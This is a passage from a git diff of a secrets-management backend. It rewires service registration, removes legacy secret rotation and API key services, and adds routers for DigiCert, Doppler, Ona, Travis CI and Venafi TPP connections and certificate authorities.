snapshotSecretV2BridgeDAL = snapshotSecretV2DALFactory(db); @@ -675,7 +680,7 @@ export const registerRoutes = async ( const appConnectionCredentialRotationDAL = appConnectionCredentialRotationDALFactory(db); - const vaultExternalMigrationConfigDAL = vaultExternalMigrationConfigDALFactory(db); + const externalMigrationConfigDAL = externalMigrationConfigDALFactory(db); // New event bus for inter-container communication const eventBusService = eventBusServiceFactory({ redis: server.redis }); @@ -694,7 +699,6 @@ export const registerRoutes = async ( }); const assumePrivilegeService = assumePrivilegeServiceFactory({ - projectDAL, permissionService }); @@ -874,7 +878,6 @@ export const registerRoutes = async ( }); const groupProjectService = groupProjectServiceFactory({ groupDAL, - projectDAL, permissionService }); @@ -977,12 +980,11 @@ export const registerRoutes = async ( membershipUserDAL }); - const upgradePathService = upgradePathServiceFactory({ keyStore }); - const totpService = totpServiceFactory({ totpConfigDAL, userDAL, - kmsService + kmsService, + keyStore }); const webAuthnService = webAuthnServiceFactory({ @@ -1177,7 +1179,6 @@ export const registerRoutes = async ( rateLimitDAL, licenseService }); - const apiKeyService = apiKeyServiceFactory({ apiKeyDAL, userDAL }); const secretScanningQueue = secretScanningQueueFactory({ telemetryService, @@ -1256,12 +1257,14 @@ export const registerRoutes = async ( const acmeEnrollmentConfigDAL = acmeEnrollmentConfigDALFactory(db); const scepEnrollmentConfigDAL = scepEnrollmentConfigDALFactory(db); const scepTransactionDAL = scepTransactionDALFactory(db); + const scepDynamicChallengeDAL = scepDynamicChallengeDALFactory(db); const acmeAccountDAL = pkiAcmeAccountDALFactory(db); const acmeOrderDAL = pkiAcmeOrderDALFactory(db); const acmeAuthDAL = pkiAcmeAuthDALFactory(db); const acmeOrderAuthDAL = pkiAcmeOrderAuthDALFactory(db); const acmeChallengeDAL = pkiAcmeChallengeDALFactory(db); const certificateCleanupConfigDAL = certificateCleanupConfigDALFactory(db); + const certificateInventoryViewDAL = certificateInventoryViewDALFactory(db); const certificateDAL = certificateDALFactory(db); const certificateBodyDAL = certificateBodyDALFactory(db); const certificateSecretDAL = certificateSecretDALFactory(db); @@ -1287,6 +1290,9 @@ export const registerRoutes = async ( const orgRelayConfigDAL = orgRelayConfigDalFactory(db); const relayDAL = relayDalFactory(db); const gatewayV2DAL = gatewayV2DalFactory(db); + const gatewayEnrollmentTokenDAL = gatewayEnrollmentTokenDALFactory(db); + const gatewayPoolDAL = gatewayPoolDalFactory(db); + const gatewayPoolMembershipDAL = gatewayPoolMembershipDalFactory(db); const approvalPolicyDAL = approvalPolicyDALFactory(db); @@ -1374,6 +1380,7 @@ export const registerRoutes = async ( estEnrollmentConfigDAL, acmeEnrollmentConfigDAL, scepEnrollmentConfigDAL, + scepDynamicChallengeDAL, certificateBodyDAL, certificateSecretDAL, certificateAuthorityDAL, @@ -1445,6 +1452,7 @@ export const registerRoutes = async ( relayService, orgGatewayConfigV2DAL, gatewayV2DAL, + gatewayEnrollmentTokenDAL, relayDAL, permissionService, orgDAL, @@ -1459,6 +1467,16 @@ export const registerRoutes = async ( pkiDiscoveryConfigDAL }); + const gatewayPoolService = gatewayPoolServiceFactory({ + gatewayPoolDAL, + gatewayPoolMembershipDAL, + gatewayV2DAL, + gatewayV2Service, + permissionService, + licenseService, + identityKubernetesAuthDAL + }); + const secretSyncQueue = secretSyncQueueFactory({ queueService, secretSyncDAL, @@ -1518,7 +1536,6 @@ export const registerRoutes = async ( secretVersionV2BridgeDAL, secretV2BridgeDAL, secretVersionTagV2BridgeDAL, - secretRotationDAL, integrationAuthDAL, snapshotDAL, snapshotSecretV2BridgeDAL, @@ -1582,7 +1599,6 @@ export const registerRoutes = async ( projectEnvDAL, keyStore, licenseService, - projectDAL, folderDAL, accessApprovalPolicyEnvironmentDAL, secretApprovalPolicyEnvironmentDAL: sapEnvironmentDAL @@ -1623,7 +1639,8 @@ export const registerRoutes = async ( permissionService, kmsService, folderDAL, - secretDAL: secretV2BridgeDAL + secretDAL: secretV2BridgeDAL, + secretVersionV2BridgeDAL }); const folderService = secretFolderServiceFactory({ permissionService, @@ -1810,32 +1827,6 @@ export const registerRoutes = async ( folderCommitService }); - const secretRotationQueue = secretRotationQueueFactory({ - telemetryService, - secretRotationDAL, - queue: queueService, - secretDAL, - secretVersionDAL, - projectBotService, - secretVersionV2BridgeDAL, - secretV2BridgeDAL, - folderCommitService, - kmsService - }); - - const secretRotationService = secretRotationServiceFactory({ - permissionService, - secretRotationDAL, - secretRotationQueue, - projectDAL, - licenseService, - secretDAL, - folderDAL, - projectBotService, - secretV2BridgeDAL, - kmsService - }); - const integrationService = integrationServiceFactory({ permissionService, folderDAL, @@ -1949,7 +1940,9 @@ export const registerRoutes = async ( gatewayV2DAL, gatewayDAL, kmsService, - membershipIdentityDAL + membershipIdentityDAL, + gatewayPoolService, + gatewayPoolDAL }); const identityGcpAuthService = identityGcpAuthServiceFactory({ identityDAL, @@ -2104,6 +2097,11 @@ export const registerRoutes = async ( permissionService }); + const certificateInventoryViewService = certificateInventoryViewServiceFactory({ + certificateInventoryViewDAL, + permissionService + }); + const certificateCleanupQueue = certificateCleanupQueueFactory({ db, queueService, @@ -2314,7 +2312,6 @@ export const registerRoutes = async ( appConnectionService, kmsService, permissionService, - projectDAL, orgDAL, folderDAL, secretSyncQueue, @@ -2336,7 +2333,6 @@ export const registerRoutes = async ( const kmipOperationService = kmipOperationServiceFactory({ kmsService, kmsDAL, - projectDAL, kmipClientDAL, permissionService }); @@ -2365,6 +2361,19 @@ export const registerRoutes = async ( gatewayV2Service }); + const insightsService = insightsServiceFactory({ + permissionService, + licenseService, + auditLogDAL, + secretRotationV2DAL, + reminderDAL, + folderDAL, + secretV2BridgeDAL, + projectBotService, + userDAL, + keyStore + }); + const pkiSyncQueue = pkiSyncQueueFactory({ queueService, kmsService, @@ -2474,7 +2483,10 @@ export const registerRoutes = async ( pkiSubscriberDAL, projectDAL, pkiSyncDAL, - pkiSyncQueue + pkiSyncQueue, + certificateRequestDAL, + resourceMetadataDAL, + gatewayV2Service }); const certificateEstService = certificateEstServiceFactory({ @@ -2519,6 +2531,18 @@ export const registerRoutes = async ( pkiAlertV2Queue }); + const digicertCaFns = DigiCertCertificateAuthorityFns({ + appConnectionDAL, + appConnectionService, + certificateAuthorityDAL, + externalCertificateAuthorityDAL, + certificateDAL, + certificateBodyDAL, + certificateSecretDAL, + kmsService, + projectDAL + }); + const certificateRequestService = certificateRequestServiceFactory({ certificateRequestDAL, certificateDAL, @@ -2543,8 +2567,10 @@ export const registerRoutes = async ( pkiSyncQueue, certificateProfileDAL, certificateRequestService, + certificateRequestDAL, resourceMetadataDAL, - pkiAlertV2Queue + pkiAlertV2Queue, + gatewayV2Service }); const certificateApprovalService = certificateApprovalServiceFactory({ @@ -2618,10 +2644,22 @@ export const registerRoutes = async ( auditLogService }); + const digicertCaQueue = digicertCertificateAuthorityQueueServiceFactory({ + queueService, + certificateRequestDAL, + certificateRequestService, + certificateAuthorityDAL, + appConnectionDAL, + kmsService, + resourceMetadataDAL, + digicertFns: digicertCaFns + }); + const certificateEstV3Service = certificateEstV3ServiceFactory({ certificateV3Service, certificateAuthorityDAL, certificateAuthorityCertDAL, + certificateDAL, projectDAL, kmsService, licenseService, @@ -2634,7 +2672,9 @@ export const registerRoutes = async ( certificateV3Service, certificateProfileDAL, scepEnrollmentConfigDAL, + scepDynamicChallengeDAL, scepTransactionDAL, + certificateDAL, certificateAuthorityDAL, certificateAuthorityCertDAL, certificateRequestDAL, @@ -2646,7 +2686,8 @@ export const registerRoutes = async ( certificatePolicyService, certificateRequestService, certificateIssuanceQueue, - auditLogService + auditLogService, + permissionService }); const acmeChallengeService = pkiAcmeChallengeServiceFactory({ @@ -2731,7 +2772,6 @@ export const registerRoutes = async ( const pkiDiscoveryService = pkiDiscoveryServiceFactory({ pkiDiscoveryConfigDAL, pkiDiscoveryScanHistoryDAL, - projectDAL, permissionService, gatewayV2DAL, queuePkiDiscoveryScan: pkiDiscoveryQueue.queuePkiDiscoveryScan @@ -2814,6 +2854,7 @@ export const registerRoutes = async ( }); const pamFolderDAL = pamFolderDALFactory(db); + const pamDomainDAL = pamDomainDALFactory(db); const pamResourceFavoriteDAL = pamResourceFavoriteDALFactory(db); const pamAccountDAL = pamAccountDALFactory(db); const pamAccountPolicyDAL = pamAccountPolicyDALFactory(db); @@ -2841,6 +2882,7 @@ export const registerRoutes = async ( const pamResourceService = pamResourceServiceFactory({ pamResourceDAL, pamResourceFavoriteDAL, + pamDomainDAL, pamAccountDAL, permissionService, kmsService, @@ -2849,6 +2891,15 @@ export const registerRoutes = async ( appConnectionDAL }); + const pamDomainService = pamDomainServiceFactory({ + pamDomainDAL, + pamResourceDAL, + permissionService, + kmsService, + gatewayV2Service, + resourceMetadataDAL + }); + const pamResourceRotationRulesService = pamResourceRotationRulesServiceFactory({ pamResourceRotationRulesDAL, pamResourceDAL, @@ -2884,6 +2935,7 @@ export const registerRoutes = async ( const pamAccountService = pamAccountServiceFactory({ pamAccountDAL, + pamDomainDAL, pamAccountPolicyDAL, pamResourceRotationRulesDAL, gatewayV2Service, @@ -2902,7 +2954,8 @@ export const registerRoutes = async ( approvalPolicyDAL, pamSessionExpirationService, resourceMetadataDAL, - pamAccountDependenciesDAL + pamAccountDependenciesDAL, + keyStore }); const pamAccountRotation = pamAccountRotationServiceFactory({ @@ -2923,6 +2976,7 @@ export const registerRoutes = async ( const pamWebAccessService = pamWebAccessServiceFactory({ pamAccountDAL, + pamAccountPolicyDAL, pamResourceDAL, permissionService, auditLogService, @@ -2946,6 +3000,7 @@ export const registerRoutes = async ( pamDiscoverySourceAccountsDAL, pamDiscoverySourceDependenciesDAL, pamAccountDependenciesDAL, + pamDomainDAL, pamResourceDAL, pamAccountDAL, kmsService, @@ -3010,7 +3065,7 @@ export const registerRoutes = async ( gatewayService, kmsService, appConnectionService, - vaultExternalMigrationConfigDAL, + externalMigrationConfigDAL, secretService, auditLogService, gatewayV2Service @@ -3068,6 +3123,7 @@ export const registerRoutes = async ( await pkiAlertV2Queue.init(); await certificateCleanupQueue.init(); await certificateV3Queue.init(); + await digicertCaQueue.init(); await caAutoRenewalQueue.startDailyAutoRenewalJob(); await microsoftTeamsService.start(); await eventBusService.init(); @@ -3085,7 +3141,6 @@ export const registerRoutes = async ( org: orgService, subOrganization: subOrgService, oidc: oidcService, - apiKey: apiKeyService, authToken: tokenService, superAdmin: superAdminService, offlineUsageReport: offlineUsageReportService, @@ -3126,7 +3181,6 @@ export const registerRoutes = async ( accessApprovalRequest: accessApprovalRequestService, secretApprovalPolicy: secretApprovalPolicyService, secretApprovalRequest: secretApprovalRequestService, - secretRotation: secretRotationService, dynamicSecret: dynamicSecretService, dynamicSecretLease: dynamicSecretLeaseService, emailDomain: emailDomainService, @@ -3137,6 +3191,7 @@ export const registerRoutes = async ( auditLogStream: auditLogStreamService, certificate: certificateService, certificateCleanup: certificateCleanupService, + certificateInventoryView: certificateInventoryViewService, certificateV3: certificateV3Service, certificateRequest: certificateRequestService, certificateEstV3: certificateEstV3Service, @@ -3189,9 +3244,11 @@ export const registerRoutes = async ( gateway: gatewayService, relay: relayService, gatewayV2: gatewayV2Service, + gatewayPool: gatewayPoolService, secretRotationV2: secretRotationV2Service, microsoftTeams: microsoftTeamsService, assumePrivileges: assumePrivilegeService, + insights: insightsService, githubOrgSync: githubOrgSyncConfigService, folderCommit: folderCommitService, secretScanningV2: secretScanningV2Service, @@ -3202,6 +3259,7 @@ export const registerRoutes = async ( notification: notificationService, pamFolder: pamFolderService, pamResource: pamResourceService, + pamDomain: pamDomainService, pamResourceRotationRules: pamResourceRotationRulesService, pamAccount: pamAccountService, pamAccountPolicy: pamAccountPolicyService, @@ -3209,8 +3267,6 @@ export const registerRoutes = async ( pamWebAccess: pamWebAccessService, pamDiscoverySource: pamDiscoverySourceService, mfaSession: mfaSessionService, - upgradePath: upgradePathService, - membershipUser: membershipUserService, membershipIdentity: membershipIdentityService, membershipGroup: membershipGroupService, @@ -3357,7 +3413,13 @@ export const registerRoutes = async ( }, { prefix: "/api/v2" } ); - await server.register(registerV3Routes, { prefix: "/api/v3" }); + await server.register( + async (v3Server) => { + await v3Server.register(registerV3EERoutes); + await v3Server.register(registerV3Routes); + }, + { prefix: "/api/v3" } + ); await server.register(registerV4Routes, { prefix: "/api/v4" }); // Note: This is a special route for BDD tests. It's only available in development mode and only for BDD tests. diff --git a/backend/src/server/routes/sanitizedSchemas.ts b/backend/src/server/routes/sanitizedSchemas.ts index 226f17fff1a..e156b3e9516 100644 --- a/backend/src/server/routes/sanitizedSchemas.ts +++ b/backend/src/server/routes/sanitizedSchemas.ts @@ -113,6 +113,7 @@ export const SanitizedUserSchema = UsersSchema.pick({ isEmailVerified: true, firstName: true, lastName: true, + authMethods: true, id: true }).extend({ publicKey: z.string().nullable().optional() diff --git a/backend/src/server/routes/v1/app-connection-routers/app-connection-endpoints.ts b/backend/src/server/routes/v1/app-connection-routers/app-connection-endpoints.ts index 08178345eb1..912a8876860 100644 --- a/backend/src/server/routes/v1/app-connection-routers/app-connection-endpoints.ts +++ b/backend/src/server/routes/v1/app-connection-routers/app-connection-endpoints.ts @@ -54,7 +54,8 @@ export const registerAppConnectionEndpoints = { diff --git a/backend/src/server/routes/v1/app-connection-routers/aws-connection-router.ts b/backend/src/server/routes/v1/app-connection-routers/aws-connection-router.ts index 92eedb1165d..4dc0abf38a7 100644 --- a/backend/src/server/routes/v1/app-connection-routers/aws-connection-router.ts +++ b/backend/src/server/routes/v1/app-connection-routers/aws-connection-router.ts @@ -94,7 +94,12 @@ export const registerAwsConnectionRouter = async (server: FastifyZodProvider) => req.permission ); - return { iamUsers }; + return { + iamUsers: iamUsers.map((user) => ({ + UserName: user.UserName ?? "", + Arn: user.Arn ?? "" + })) + }; } }); }; diff --git a/backend/src/server/routes/v1/app-connection-routers/digicert-connection-router.ts b/backend/src/server/routes/v1/app-connection-routers/digicert-connection-router.ts new file mode 100644 index 00000000000..05ad021b4cb --- /dev/null +++ b/backend/src/server/routes/v1/app-connection-routers/digicert-connection-router.ts @@ -0,0 +1,81 @@ +import z from "zod"; + +import { readLimit } from "@app/server/config/rateLimiter"; +import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { + CreateDigiCertConnectionSchema, + SanitizedDigiCertConnectionSchema, + UpdateDigiCertConnectionSchema +} from "@app/services/app-connection/digicert/digicert-connection-schemas"; +import { AuthMode } from "@app/services/auth/auth-type"; + +import { registerAppConnectionEndpoints } from "./app-connection-endpoints"; + +export const registerDigiCertConnectionRouter = async (server: FastifyZodProvider) => { + registerAppConnectionEndpoints({ + app: AppConnection.DigiCert, + server, + sanitizedResponseSchema: SanitizedDigiCertConnectionSchema, + createSchema: CreateDigiCertConnectionSchema, + updateSchema: UpdateDigiCertConnectionSchema + }); + + server.route({ + method: "GET", + url: `/:connectionId/organizations`, + config: { + rateLimit: readLimit + }, + schema: { + operationId: "listDigiCertOrganizations", + params: z.object({ + connectionId: z.string().uuid() + }), + response: { + 200: z + .object({ + id: z.number(), + name: z.string(), + displayName: z.string().optional(), + status: z.string().optional() + }) + .array() + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const { connectionId } = req.params; + return server.services.appConnection.digicert.listOrganizations(connectionId, req.permission); + } + }); + + server.route({ + method: "GET", + url: `/:connectionId/products`, + config: { + rateLimit: readLimit + }, + schema: { + operationId: "listDigiCertProducts", + params: z.object({ + connectionId: z.string().uuid() + }), + response: { + 200: z + .object({ + nameId: z.string(), + name: z.string(), + type: z.string().optional(), + validationType: z.string().optional() + }) + .array() + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const { connectionId } = req.params; + return server.services.appConnection.digicert.listProducts(connectionId, req.permission); + } + }); +}; diff --git a/backend/src/server/routes/v1/app-connection-routers/doppler-connection-router.ts b/backend/src/server/routes/v1/app-connection-routers/doppler-connection-router.ts new file mode 100644 index 00000000000..12dc6932b94 --- /dev/null +++ b/backend/src/server/routes/v1/app-connection-routers/doppler-connection-router.ts @@ -0,0 +1,18 @@ +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { + CreateDopplerConnectionSchema, + SanitizedDopplerConnectionSchema, + UpdateDopplerConnectionSchema +} from "@app/services/app-connection/doppler/doppler-connection-schema"; + +import { registerAppConnectionEndpoints } from "./app-connection-endpoints"; + +export const registerDopplerConnectionRouter = async (server: FastifyZodProvider) => { + registerAppConnectionEndpoints({ + app: AppConnection.Doppler, + server, + sanitizedResponseSchema: SanitizedDopplerConnectionSchema, + createSchema: CreateDopplerConnectionSchema, + updateSchema: UpdateDopplerConnectionSchema + }); +}; diff --git a/backend/src/server/routes/v1/app-connection-routers/index.ts b/backend/src/server/routes/v1/app-connection-routers/index.ts index 0755d814e21..e6a9250160d 100644 --- a/backend/src/server/routes/v1/app-connection-routers/index.ts +++ b/backend/src/server/routes/v1/app-connection-routers/index.ts @@ -21,8 +21,10 @@ import { registerCircleCIConnectionRouter } from "./circleci-connection-router"; import { registerCloudflareConnectionRouter } from "./cloudflare-connection-router"; import { registerDatabricksConnectionRouter } from "./databricks-connection-router"; import { registerDbtConnectionRouter } from "./dbt-connection-router"; +import { registerDigiCertConnectionRouter } from "./digicert-connection-router"; import { registerDigitalOceanConnectionRouter } from "./digital-ocean-connection-router"; import { registerDNSMadeEasyConnectionRouter } from "./dns-made-easy-connection-router"; +import { registerDopplerConnectionRouter } from "./doppler-connection-router"; import { registerExternalInfisicalConnectionRouter } from "./external-infisical-connection-router"; import { registerFlyioConnectionRouter } from "./flyio-connection-router"; import { registerGcpConnectionRouter } from "./gcp-connection-router"; @@ -42,6 +44,7 @@ import { registerNetScalerConnectionRouter } from "./netscaler-connection-router import { registerNorthflankConnectionRouter } from "./northflank-connection-router"; import { registerOctopusDeployConnectionRouter } from "./octopus-deploy-connection-router"; import { registerOktaConnectionRouter } from "./okta-connection-router"; +import { registerOnaConnectionRouter } from "./ona-connection-router"; import { registerOpenRouterConnectionRouter } from "./open-router-connection-router"; import { registerPostgresConnectionRouter } from "./postgres-connection-router"; import { registerRailwayConnectionRouter } from "./railway-connection-router"; @@ -52,7 +55,9 @@ import { registerSshConnectionRouter } from "./ssh-connection-router"; import { registerSupabaseConnectionRouter } from "./supabase-connection-router"; import { registerTeamCityConnectionRouter } from "./teamcity-connection-router"; import { registerTerraformCloudConnectionRouter } from "./terraform-cloud-router"; +import { registerTravisCIConnectionRouter } from "./travis-ci-connection-router"; import { registerVenafiConnectionRouter } from "./venafi-connection-router"; +import { registerVenafiTppConnectionRouter } from "./venafi-tpp-connection-router"; import { registerVercelConnectionRouter } from "./vercel-connection-router"; import { registerWindmillConnectionRouter } from "./windmill-connection-router"; import { registerZabbixConnectionRouter } from "./zabbix-connection-router"; @@ -114,7 +119,12 @@ export const APP_CONNECTION_REGISTER_ROUTER_MAP: Record { + registerAppConnectionEndpoints({ + app: AppConnection.Ona, + server, + sanitizedResponseSchema: SanitizedOnaConnectionSchema, + createSchema: CreateOnaConnectionSchema, + updateSchema: UpdateOnaConnectionSchema + }); + + // The below endpoints are not exposed and for Infisical App use + server.route({ + method: "GET", + url: `/:connectionId/projects`, + config: { + rateLimit: readLimit + }, + schema: { + operationId: "listOnaProjects", + params: z.object({ + connectionId: z.string().uuid() + }), + response: { + 200: z + .object({ + id: z.string(), + name: z.string() + }) + .array() + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const { connectionId } = req.params; + + const projects = await server.services.appConnection.ona.listProjects(connectionId, req.permission); + + return projects; + } + }); +}; diff --git a/backend/src/server/routes/v1/app-connection-routers/travis-ci-connection-router.ts b/backend/src/server/routes/v1/app-connection-routers/travis-ci-connection-router.ts new file mode 100644 index 00000000000..9aac4a68810 --- /dev/null +++ b/backend/src/server/routes/v1/app-connection-routers/travis-ci-connection-router.ts @@ -0,0 +1,93 @@ +import z from "zod"; + +import { readLimit } from "@app/server/config/rateLimiter"; +import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { + CreateTravisCIConnectionSchema, + SanitizedTravisCIConnectionSchema, + UpdateTravisCIConnectionSchema +} from "@app/services/app-connection/travis-ci"; +import { AuthMode } from "@app/services/auth/auth-type"; + +import { registerAppConnectionEndpoints } from "./app-connection-endpoints"; + +export const registerTravisCIConnectionRouter = async (server: FastifyZodProvider) => { + registerAppConnectionEndpoints({ + app: AppConnection.TravisCI, + server, + sanitizedResponseSchema: SanitizedTravisCIConnectionSchema, + createSchema: CreateTravisCIConnectionSchema, + updateSchema: UpdateTravisCIConnectionSchema + }); + + // The below endpoints are not exposed and for Infisical App use + server.route({ + method: "GET", + url: `/:connectionId/repositories`, + config: { + rateLimit: readLimit + }, + schema: { + operationId: "listTravisCIRepositories", + params: z.object({ + connectionId: z.string().uuid() + }), + response: { + 200: z + .object({ + id: z.string(), + name: z.string(), + slug: z.string() + }) + .array() + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const { connectionId } = req.params; + + const repositories = await server.services.appConnection.travisCI.listRepositories(connectionId, req.permission); + + return repositories; + } + }); + + server.route({ + method: "GET", + url: `/:connectionId/branches`, + config: { + rateLimit: readLimit + }, + schema: { + operationId: "listTravisCIBranches", + params: z.object({ + connectionId: z.string().uuid() + }), + querystring: z.object({ + repositoryId: z.string().min(1, "Repository ID is required") + }), + response: { + 200: z + .object({ + name: z.string(), + isDefault: z.boolean() + }) + .array() + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const { connectionId } = req.params; + const { repositoryId } = req.query; + + const branches = await server.services.appConnection.travisCI.listBranches( + connectionId, + repositoryId, + req.permission + ); + + return branches; + } + }); +}; diff --git a/backend/src/server/routes/v1/app-connection-routers/venafi-tpp-connection-router.ts b/backend/src/server/routes/v1/app-connection-routers/venafi-tpp-connection-router.ts new file mode 100644 index 00000000000..5789a963337 --- /dev/null +++ b/backend/src/server/routes/v1/app-connection-routers/venafi-tpp-connection-router.ts @@ -0,0 +1,18 @@ +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { + CreateVenafiTppConnectionSchema, + SanitizedVenafiTppConnectionSchema, + UpdateVenafiTppConnectionSchema +} from "@app/services/app-connection/venafi-tpp"; + +import { registerAppConnectionEndpoints } from "./app-connection-endpoints"; + +export const registerVenafiTppConnectionRouter = async (server: FastifyZodProvider) => { + registerAppConnectionEndpoints({ + app: AppConnection.VenafiTpp, + server, + sanitizedResponseSchema: SanitizedVenafiTppConnectionSchema, + createSchema: CreateVenafiTppConnectionSchema, + updateSchema: UpdateVenafiTppConnectionSchema + }); +}; diff --git a/backend/src/server/routes/v1/certificate-authority-routers/aws-acm-public-ca-certificate-authority-router.ts b/backend/src/server/routes/v1/certificate-authority-routers/aws-acm-public-ca-certificate-authority-router.ts new file mode 100644 index 00000000000..d916752b210 --- /dev/null +++ b/backend/src/server/routes/v1/certificate-authority-routers/aws-acm-public-ca-certificate-authority-router.ts @@ -0,0 +1,18 @@ +import { + AwsAcmPublicCaCertificateAuthoritySchema, + CreateAwsAcmPublicCaCertificateAuthoritySchema, + UpdateAwsAcmPublicCaCertificateAuthoritySchema +} from "@app/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-schemas"; +import { CaType } from "@app/services/certificate-authority/certificate-authority-enums"; + +import { registerCertificateAuthorityEndpoints } from "./certificate-authority-endpoints"; + +export const registerAwsAcmPublicCaCertificateAuthorityRouter = async (server: FastifyZodProvider) => { + registerCertificateAuthorityEndpoints({ + caType: CaType.AWS_ACM_PUBLIC_CA, + server, + responseSchema: AwsAcmPublicCaCertificateAuthoritySchema, + createSchema: CreateAwsAcmPublicCaCertificateAuthoritySchema, + updateSchema: UpdateAwsAcmPublicCaCertificateAuthoritySchema + }); +}; diff --git a/backend/src/server/routes/v1/certificate-authority-routers/digicert-certificate-authority-router.ts b/backend/src/server/routes/v1/certificate-authority-routers/digicert-certificate-authority-router.ts new file mode 100644 index 00000000000..8e34e3c2d1a --- /dev/null +++ b/backend/src/server/routes/v1/certificate-authority-routers/digicert-certificate-authority-router.ts @@ -0,0 +1,18 @@ +import { CaType } from "@app/services/certificate-authority/certificate-authority-enums"; +import { + CreateDigiCertCertificateAuthoritySchema, + DigiCertCertificateAuthoritySchema, + UpdateDigiCertCertificateAuthoritySchema +} from "@app/services/certificate-authority/digicert/digicert-certificate-authority-schemas"; + +import { registerCertificateAuthorityEndpoints } from "./certificate-authority-endpoints"; + +export const registerDigiCertCertificateAuthorityRouter = async (server: FastifyZodProvider) => { + registerCertificateAuthorityEndpoints({ + caType: CaType.DIGICERT, + server, + responseSchema: DigiCertCertificateAuthoritySchema, + createSchema: CreateDigiCertCertificateAuthoritySchema, + updateSchema: UpdateDigiCertCertificateAuthoritySchema + }); +}; diff --git a/backend/src/server/routes/v1/certificate-authority-routers/general-certificate-authority-router.ts b/backend/src/server/routes/v1/certificate-authority-routers/general-certificate-authority-router.ts index 81f36c9e7a6..d417ce835ef 100644 --- a/backend/src/server/routes/v1/certificate-authority-routers/general-certificate-authority-router.ts +++ b/backend/src/server/routes/v1/certificate-authority-routers/general-certificate-authority-router.ts @@ -6,16 +6,22 @@ import { readLimit } from "@app/server/config/rateLimiter"; import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; import { AuthMode } from "@app/services/auth/auth-type"; import { AcmeCertificateAuthoritySchema } from "@app/services/certificate-authority/acme/acme-certificate-authority-schemas"; +import { AwsAcmPublicCaCertificateAuthoritySchema } from "@app/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-schemas"; import { AwsPcaCertificateAuthoritySchema } from "@app/services/certificate-authority/aws-pca/aws-pca-certificate-authority-schemas"; import { AzureAdCsCertificateAuthoritySchema } from "@app/services/certificate-authority/azure-ad-cs/azure-ad-cs-certificate-authority-schemas"; import { CaType } from "@app/services/certificate-authority/certificate-authority-enums"; +import { DigiCertCertificateAuthoritySchema } from "@app/services/certificate-authority/digicert/digicert-certificate-authority-schemas"; import { InternalCertificateAuthoritySchema } from "@app/services/certificate-authority/internal/internal-certificate-authority-schemas"; +import { VenafiTppCertificateAuthoritySchema } from "@app/services/certificate-authority/venafi-tpp/venafi-tpp-certificate-authority-schemas"; const CertificateAuthoritySchema = z.discriminatedUnion("type", [ InternalCertificateAuthoritySchema, AcmeCertificateAuthoritySchema, AzureAdCsCertificateAuthoritySchema, - AwsPcaCertificateAuthoritySchema + AwsPcaCertificateAuthoritySchema, + DigiCertCertificateAuthoritySchema, + AwsAcmPublicCaCertificateAuthoritySchema, + VenafiTppCertificateAuthoritySchema ]); export const registerGeneralCertificateAuthorityRouter = async (server: FastifyZodProvider) => { @@ -73,6 +79,30 @@ export const registerGeneralCertificateAuthorityRouter = async (server: FastifyZ req.permission ); + const digicertCas = await server.services.certificateAuthority.listCertificateAuthoritiesByProjectId( + { + projectId: req.query.projectId, + type: CaType.DIGICERT + }, + req.permission + ); + + const awsAcmPublicCas = await server.services.certificateAuthority.listCertificateAuthoritiesByProjectId( + { + projectId: req.query.projectId, + type: CaType.AWS_ACM_PUBLIC_CA + }, + req.permission + ); + + const venafiTppCas = await server.services.certificateAuthority.listCertificateAuthoritiesByProjectId( + { + projectId: req.query.projectId, + type: CaType.VENAFI_TPP + }, + req.permission + ); + await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, projectId: req.query.projectId, @@ -83,7 +113,10 @@ export const registerGeneralCertificateAuthorityRouter = async (server: FastifyZ ...(internalCas ?? []).map((ca) => ca.id), ...(acmeCas ?? []).map((ca) => ca.id), ...(azureAdCsCas ?? []).map((ca) => ca.id), - ...(awsPcaCas ?? []).map((ca) => ca.id) + ...(awsPcaCas ?? []).map((ca) => ca.id), + ...(digicertCas ?? []).map((ca) => ca.id), + ...(awsAcmPublicCas ?? []).map((ca) => ca.id), + ...(venafiTppCas ?? []).map((ca) => ca.id) ] } } @@ -94,7 +127,10 @@ export const registerGeneralCertificateAuthorityRouter = async (server: FastifyZ ...(internalCas ?? []), ...(acmeCas ?? []), ...(azureAdCsCas ?? []), - ...(awsPcaCas ?? []) + ...(awsPcaCas ?? []), + ...(digicertCas ?? []), + ...(awsAcmPublicCas ?? []), + ...(venafiTppCas ?? []) ] }; } diff --git a/backend/src/server/routes/v1/certificate-authority-routers/index.ts b/backend/src/server/routes/v1/certificate-authority-routers/index.ts index 5b87322ac52..2e34156748d 100644 --- a/backend/src/server/routes/v1/certificate-authority-routers/index.ts +++ b/backend/src/server/routes/v1/certificate-authority-routers/index.ts @@ -1,9 +1,12 @@ import { CaType } from "@app/services/certificate-authority/certificate-authority-enums"; import { registerAcmeCertificateAuthorityRouter } from "./acme-certificate-authority-router"; +import { registerAwsAcmPublicCaCertificateAuthorityRouter } from "./aws-acm-public-ca-certificate-authority-router"; import { registerAwsPcaCertificateAuthorityRouter } from "./aws-pca-certificate-authority-router"; import { registerAzureAdCsCertificateAuthorityRouter } from "./azure-ad-cs-certificate-authority-router"; +import { registerDigiCertCertificateAuthorityRouter } from "./digicert-certificate-authority-router"; import { registerInternalCertificateAuthorityRouter } from "./internal-certificate-authority-router"; +import { registerVenafiTppCertificateAuthorityRouter } from "./venafi-tpp-certificate-authority-router"; export * from "./internal-certificate-authority-router"; @@ -12,5 +15,8 @@ export const CERTIFICATE_AUTHORITY_REGISTER_ROUTER_MAP: Record { + registerCertificateAuthorityEndpoints({ + caType: CaType.VENAFI_TPP, + server, + responseSchema: VenafiTppCertificateAuthoritySchema, + createSchema: CreateVenafiTppCertificateAuthoritySchema, + updateSchema: 